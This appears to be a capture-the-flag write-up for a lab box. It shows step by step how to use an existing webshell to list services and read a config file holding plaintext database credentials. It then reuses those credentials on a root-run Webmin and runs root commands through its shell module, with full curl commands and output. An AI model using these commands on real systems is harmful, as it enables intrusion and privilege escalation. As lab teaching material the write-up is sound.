N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

Chain of Attacks - II

Continue from the Part I www-data webshell. Escalate to root and read /root/proof.txt

Boot2RootMarkdown + PDFHardsolved1 minread·311words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/chain-of-attacks-ii
archive index
9 / 16
read mode
parsed markdown
Writeup loaded.

Chain of Attacks - II

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.21
category
Boot2Root
points
856
difficulty
Hard
flag format
OWASPKL{xxx}
tools used
curlgrep
final flag
OWASPKL{68e8511198425c0cbbb3f0d182314afd}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Continue from the Part I www-data webshell. Escalate to root and read /root/proof.txt:

Use the webshell to find local services and leak DB credentials from db.config.

Reuse those credentials on Webmin (9090), which runs as root.

Run a command as root in the Webmin shell module.

2. Initial Reconnaissance

2.1 Enumerate from the Part I webshell

bash2 lines
1curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=id'2curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=ss%20-tln'
bash3 lines
1uid=33(www-data) gid=33(www-data) groups=33(www-data)2LISTEN 0  ... 127.0.0.1:33063LISTEN 0  ... 0.0.0.0:9090     # Webmin / MiniServ
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Locate and read db.config

bash2 lines
1curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=find%20/var/www/html%20-name%20db.config'2curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=cat%20/var/www/html/ritecms/db.config'
ini6 lines
1[database]2host     = localhost3name     = chaindb4username = aimantino5password = 4iman_4dmin@20246port     = 3306

The DB user aimantino:4iman_4dmin@2024 is the only reusable credential on the box — the pivot target is the root-run Webmin on 9090.

PDF evidence frame 03

4. Exploitation / Recovery

4.1 Log into Webmin with the leaked creds

bash4 lines
1curl -k -s -c /tmp/wm.cookie https://192.168.1.21:9090/ > /dev/null2curl -k -s -i -b /tmp/wm.cookie -c /tmp/wm.cookie \3  -d 'page=%2F&user=aimantino&pass=4iman_4dmin%402024' \4  -X POST https://192.168.1.21:9090/session_login.cgi
bash3 lines
1HTTP/1.0 302 Moved Temporarily2Set-Cookie: sid=...; path=/; secure; httpOnly; SameSite=Lax3Location: https://192.168.1.21:9090/

4.2 Run a root command in the Webmin Shell module

/shell/index.cgi expects multipart/form-data, so use -F. Webmin runs as root, so the command output is root-owned. List /root, hunt the flag pattern, then read it.

bash5 lines
1curl -k -s -b /tmp/wm.cookie \2  -H 'Referer: https://192.168.1.21:9090/shell/' \3  -X POST 'https://192.168.1.21:9090/shell/index.cgi' \4  -F 'cmd=id; ls -la /root; grep -Rns "OWASPKL{" /root 2>/dev/null; cat /root/proof.txt' \5  -F 'pwd=/root' -F 'history='
bash5 lines
1uid=0(root) gid=0(root) groups=0(root)2drwx------  1 root root 4096 ... .3-rw-r--r--  1 root root   42 May 25 21:17 proof.txt4/root/proof.txt:1:OWASPKL{68e8511198425c0cbbb3f0d182314afd}5OWASPKL{68e8511198425c0cbbb3f0d182314afd}

> Re-validated live on 2026-05-31 via Kali (192.168.1.10): Webmin login returned 302 for aimantino, the Command Shell module loaded (Command Shell - Webmin 2.641 on chain); ls -la /root + grep "OWASPKL{" located /root/proof.txt (root-owned, 42 bytes) holding the flag above.

PDF evidence frame 04

>

PDF evidence frame 05

5. Flag

captured flag
OWASPKL{68e8511198425c0cbbb3f0d182314afd}

6. Summary of Approach & Key Takeaways

Reused the Part I www-data webshell.

Found 127.0.0.1:3306 and root-run Webmin on 0.0.0.0:9090.

Leaked aimantino:4iman_4dmin@2024 from db.config.

Reused those creds on Webmin (login 302).

Executed cat /root/proof.txt as root via the Webmin shell module.

Plaintext creds in app config files are a direct privilege-escalation vector when reused on a root service.

Webmin's shell module = instant root RCE once authenticated.

PDF evidence frame 06
PDF evidence frame 07
PDF evidence frame 08